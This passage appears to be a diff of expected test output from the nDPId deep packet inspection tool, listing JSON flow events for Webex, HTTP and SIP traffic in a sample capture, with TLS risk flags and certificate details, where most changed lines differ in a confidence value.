{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570637191,"flow_last_seen":1444570733113,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":14432,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570637191,"flow_last_seen":1444570733113,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":14432,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640298,"flow_last_seen":1444570645704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570675941,"flow_last_seen":1444570690940,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570694561,"flow_last_seen":1444570709697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636151,"flow_last_seen":1444570638237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640284,"flow_last_seen":1444570645701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Webex","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 